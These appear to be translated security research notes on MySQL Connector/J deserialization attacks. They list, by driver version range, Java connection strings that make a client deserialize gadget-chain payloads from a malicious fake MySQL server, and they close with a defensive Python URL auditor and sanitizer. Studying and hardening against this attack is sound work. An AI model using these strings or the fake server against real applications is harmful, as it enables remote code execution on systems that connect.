Reference: https://boogipop.com/2023/03/11/WebDog%E5%BF%85%E5%AD%A6%E7%9A%84JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/

Malicious MySQL server: https://github.com/4ra1n/mysql-fake-server/releases/tag/0.0.4

ServerStatusDiffInterceptor

8.0.7-8.0.20

String url = "jdbc:mysql://127.0.0.1:3309/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
Connection conn = DriverManager.getConnection(url, username, password);

[Screenshot: image-20240226135150575.png]

6.x

String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
Connection conn = DriverManager.getConnection(url, username, password);

5.1.11-5.x.xx

The package name changed (com.mysql.cj.jdbc.interceptors becomes com.mysql.jdbc.interceptors).

String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url,username,password);

5.1.0-5.1.10

One additional query has to be executed before it triggers.

String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
Connection conn = DriverManager.getConnection(url, username, password);
String sql = "select database()";
PreparedStatement ps = conn.prepareStatement(sql);
// Execute the query; the returned ResultSet is the result table from the database
ResultSet resultSet = ps.executeQuery();

detectCustomCollations

6.0.2-6.0.6

Connection conn=null;
String url = "jdbc:mysql://127.0.0.1:3309/mysql?detectCustomCollations=true&autoDeserialize=true&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url, username, password);

In buildCollationMapping, the detectCustomCollations property is checked; when it is true, execution enters resultSetToMap.

[Screenshot: image-20240226205853009.png]

5.1.41-5.1.48

Judging by other researchers' write-ups, it works.

In my local test, the fake MySQL server could send the payload, but the client did not call readObject; it called readString instead.

5.1.29-5.1.40

The call stack is the same as above.

String url = "jdbc:mysql://127.0.0.1:3308/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url,username,password);

5.1.19-5.1.28

String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url,username,password);

In buildCollationMapping there is no check of whether the detectCustomCollations property is true.

The call stack is the same as above.

[Screenshot: image-20240226212846983.png]

8.x.x, 5.1.49, and versions below 5.1.19

In buildCollationMapping, ResultSetUtil.resultSetToMap is not called.
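Every variant above depends on connection-string parameters that the application itself controls: autoDeserialize, plus either an interceptor (queryInterceptors / statementInterceptors = ServerStatusDiffInterceptor) or detectCustomCollations as the query whose result gets deserialized. The following is an added defensive example, not code from the notes or from Connector/J: it parses a jdbc:mysql:// URL, reports those parameters, and returns a copy with the deserialization-enabling ones stripped (function names are my own; the sample URLs are the ones from the notes).

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Keys discussed in the notes: the switch that enables readObject() on BLOB
# values, and the queries whose results become the deserialization sink.
AUTO_DESER = "autoDeserialize"
INTERCEPTOR_KEYS = ("queryInterceptors", "statementInterceptors")
DANGEROUS_INTERCEPTOR = "ServerStatusDiffInterceptor"
COLLATION_KEY = "detectCustomCollations"

def parse_mysql_jdbc_url(url: str) -> dict:
    """Split a jdbc:mysql://host:port/db?k=v&k2=v2 URL into its pieces."""
    if not url.startswith("jdbc:mysql://"):
        raise ValueError("not a jdbc:mysql URL")
    parts = urlsplit(url[len("jdbc:"):])
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return {"host": parts.hostname, "port": parts.port,
            "database": parts.path.lstrip("/"), "params": params}

def audit_mysql_jdbc_url(url: str) -> list[str]:
    """Return one finding per parameter that enables the attack chain."""
    p = parse_mysql_jdbc_url(url)["params"]
    findings = []
    if p.get(AUTO_DESER, "").lower() == "true":
        findings.append(f"{AUTO_DESER}=true: BLOB results may reach readObject()")
    for key in INTERCEPTOR_KEYS:
        if DANGEROUS_INTERCEPTOR in p.get(key, ""):
            findings.append(f"{key} loads {DANGEROUS_INTERCEPTOR}: "
                            "SHOW SESSION STATUS result is the sink")
    if p.get(COLLATION_KEY, "").lower() == "true":
        findings.append(f"{COLLATION_KEY}=true: collation query result is "
                        "the sink (5.1.29-5.1.40, 6.0.2-6.0.6)")
    return findings

def sanitize_mysql_jdbc_url(url: str) -> str:
    """Rebuild the URL without autoDeserialize and the dangerous interceptor.
    Other parameters (characterEncoding, useSSL, user, ...) are preserved."""
    parts = urlsplit(url[len("jdbc:"):])
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k != AUTO_DESER
            and not (k in INTERCEPTOR_KEYS and DANGEROUS_INTERCEPTOR in v)]
    return "jdbc:" + urlunsplit(parts._replace(query=urlencode(kept)))

if __name__ == "__main__":
    sample = ("jdbc:mysql://127.0.0.1:3309/mysql?characterEncoding=utf8&useSSL=false"
              "&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"
              "&autoDeserialize=true&user=deser_CC31_calc")
    for f in audit_mysql_jdbc_url(sample):
        print("finding:", f)
    print("hardened:", sanitize_mysql_jdbc_url(sample))
```

Note that the 5.1.19-5.1.28 case needs autoDeserialize alone, so stripping that one key is the mitigation that covers every version range listed; the audit still reports the sinks separately so a reviewer can see which range a given string would have triggered.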